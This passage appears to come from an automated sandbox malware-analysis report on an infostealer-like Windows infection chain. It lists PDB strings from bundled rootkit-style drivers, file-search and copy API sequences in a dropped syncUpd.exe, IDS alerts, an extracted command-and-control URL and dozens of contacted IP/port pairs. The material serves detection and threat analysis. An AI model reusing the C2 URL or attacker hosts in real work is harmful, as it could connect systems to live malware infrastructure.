                  Source: Binary string: The module signature does not match with .pdb signature. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: .pdb.dbg source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: '(EfiGuardDxe.pdbx source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: symsrv.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: or you do not have access permission to the .pdb location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: EfiGuardDxe.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: dbghelp.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: dbghelp.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Code function: 13_2_00408123 FindFirstFileA,FindClose,13_2_00408123
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Code function: 13_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,13_2_004085B8
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe Code function: 13_2_0040342B FindFirstFileA,13_2_0040342B
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe Code function: 14_2_00403432 FindFirstFileA,14_2_00403432
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe Code function: 14_2_00408123 FindFirstFileA,FindClose,14_2_00408123
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe Code function: 14_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,14_2_004085B8
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_0040D540
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_00412570
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,15_2_0040D1C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_004015C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,15_2_004121F0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,15_2_00411650
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,15_2_0040B610
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,15_2_0040DB60
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,15_2_00411B80
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_009018B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,15_2_009018B7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008F1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_008F1827
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,15_2_008FD427
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00902457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,15_2_00902457
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,15_2_008FB877
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,15_2_008FDDC7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_00901DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,15_2_00901DE7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_008FD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_008FD7A7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 15_2_009027D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_009027D7
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\logo.png
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData
                  Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\qrcode.png

                  Networking

                  Source: Traffic Snort IDS: 2856463 ETPRO TROJAN DNS Query to Hello2Malware Domain 192.168.2.5:51596 -> 1.1.1.1:53
                  Source: Traffic Snort IDS: 2856466 ETPRO TROJAN Observed Hello2Malware Domain in TLS SNI 192.168.2.5:55130 -> 104.21.54.158:443
                  Source: Malware configuration extractor URLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                  Source: unknown DNS query: name: pastebin.com
                  Source: global trafficTCP traffic: 62.205.169.74 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 162.241.53.72 ports 57495,57364,3,4,5,6,7,53755,31414,62192
                  Source: global trafficTCP traffic: 37.187.73.7 ports 23637,12582,16113,2,3,6,7
                  Source: global trafficTCP traffic: 41.85.189.66 ports 39475,3,4,5,7,9
                  Source: global trafficTCP traffic: 77.65.50.118 ports 1,3,34159,4,5,9
                  Source: global trafficTCP traffic: 147.124.212.31 ports 11070,0,1,24230,7,51825
                  Source: global trafficTCP traffic: 62.112.11.204 ports 1,2,3,4,6,26431
                  Source: global trafficTCP traffic: 104.238.111.107 ports 5484,5452,3230,26305,23667,56225,2,30026,5,36049,6,7999
                  Source: global trafficTCP traffic: 51.158.96.66 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 43.255.113.232 ports 8082,8083,8080,8084,0,2,8,80,84
                  Source: global trafficTCP traffic: 37.228.65.107 ports 0,1,2,51032,3,5
                  Source: global trafficTCP traffic: 51.158.105.107 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 194.233.78.142 ports 49628,35760,34471,1,35513,3,5
                  Source: global trafficTCP traffic: 92.204.134.38 ports 52929,25825,9375,15393,7785,42571,25675,29718,25416,3,1555,55425,56177,5,54467,28695,7,51123,30747,9,59727
                  Source: global trafficTCP traffic: 52.67.10.183 ports 1,2,3,3128,8,80
                  Source: global trafficTCP traffic: 88.202.230.103 ports 17045,8896,0,1,13638,4,5,7
                  Source: global trafficTCP traffic: 67.213.212.50 ports 28965,2,5,6,8,9
                  Source: global trafficTCP traffic: 197.232.36.85 ports 41890,0,1,4,8,9
                  Source: global trafficTCP traffic: 162.144.36.208 ports 27829,38242,2,27531,31683,7,8,9
                  Source: global trafficTCP traffic: 181.212.136.34 ports 5199,1,5,7,8,7518
                  Source: global trafficTCP traffic: 132.148.6.255 ports 20859,0,2,5,8,9
                  Source: global trafficTCP traffic: 132.148.245.169 ports 38780,19483,0,3,7,8
                  Source: global trafficTCP traffic: 162.210.192.136 ports 0,57403,3,4,5,7
                  Source: global trafficTCP traffic: 210.5.10.87 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 72.167.222.113 ports 39574,12581,2,41629,4,8,4125,9,48892
                  Source: global trafficTCP traffic: 79.101.55.161 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 67.43.227.228 ports 26903,19479,6643,9039,1031,26957,0,1,3,31581,15753
                  Source: global trafficTCP traffic: 67.43.227.226 ports 1,2,4,5,7,32583,12745
                  Source: global trafficTCP traffic: 114.6.25.5 ports 65432,2,3,4,5,6
                  Source: global trafficTCP traffic: 94.247.241.70 ports 0,3,4,5,6,53640
                  Source: global trafficTCP traffic: 51.79.87.144 ports 41230,8533,22500,41746,0,30464,3,54395,4,6,18636
                  Source: global trafficTCP traffic: 217.23.11.194 ports 32708,0,2,3,7,8,47152
                  Source: global trafficTCP traffic: 51.68.164.77 ports 16892,1,2,6,8,9,54504,32824
                  Source: global trafficTCP traffic: 159.223.166.21 ports 5078,1372,45537,0,4,25154,6,7,47460
                  Source: global trafficTCP traffic: 31.24.44.92 ports 1,2,52173,3,5,7,50687
                  Source: global trafficTCP traffic: 67.43.228.253 ports 14493,18753,19425,18153,5189,4321,24269,25379,1,14869,3,12549,5,1277,7,8,11089,13873,9713,31947,30913,15961,32923
                  Source: global trafficTCP traffic: 67.43.228.251 ports 21223,24985,5,1265,9,5999
                  Source: global trafficTCP traffic: 148.72.209.174 ports 38088,39027,3,4,29544,7,39458,2906,16203,4734
                  Source: global trafficTCP traffic: 50.63.12.101 ports 61797,3580,6095,0,1,10647,4,6,7,17559
                  Source: global trafficTCP traffic: 77.238.79.111 ports 8080,5,6,7,8,5678
                  Source: global trafficTCP traffic: 198.12.255.193 ports 9375,22785,53281,3,5,7,6821,9,51612,48572
                  Source: global trafficTCP traffic: 209.222.97.30 ports 19481,1,15805,4,8,9
                  Source: global trafficTCP traffic: 66.29.129.54 ports 47036,0,3,4,6,7
                  Source: global trafficTCP traffic: 139.162.238.184 ports 21017,39652,22243,29870,2,3,4,13302
                  Source: global trafficTCP traffic: 36.67.27.189 ports 39674,3,4,6,7,9
                  Source: global trafficTCP traffic: 51.161.131.84 ports 63055,43712,25843,0,58612,2,4,49202,9,19987
                  Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,8,80,81,9999,82,8828
                  Source: global trafficTCP traffic: 51.75.126.150 ports 36580,19693,36694,15474,21803,64615,2,3,11802,35632,5,6,34144,4228,37847
                  Source: global trafficTCP traffic: 209.126.104.38 ports 44412,40053,40750,1,2,4,5,7,12457
                  Source: global trafficTCP traffic: 186.215.87.194 ports 8893,6032,8891,6000,6016,0,6,6009,6008
                  Source: global trafficTCP traffic: 132.148.129.254 ports 0,1,6,7,8,60781
                  Source: global trafficTCP traffic: 166.159.90.56 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 132.148.167.243 ports 0,1,2,7,48298,28040,17702
                  Source: global trafficTCP traffic: 140.227.61.156 ports 23456,2,3,4,5,6
                  Source: global trafficTCP traffic: 51.158.98.211 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 67.43.236.20 ports 24517,17167,14397,8675,8973,32083,22653,9681,20657,27945,30761,2169,11729,5599,8209,9617,7315,12239,15229,17845,18445,20685,11591,19355,6961,26169,25633,8141,4081,24603,0,16829,13959,2,11957,3389,8,9
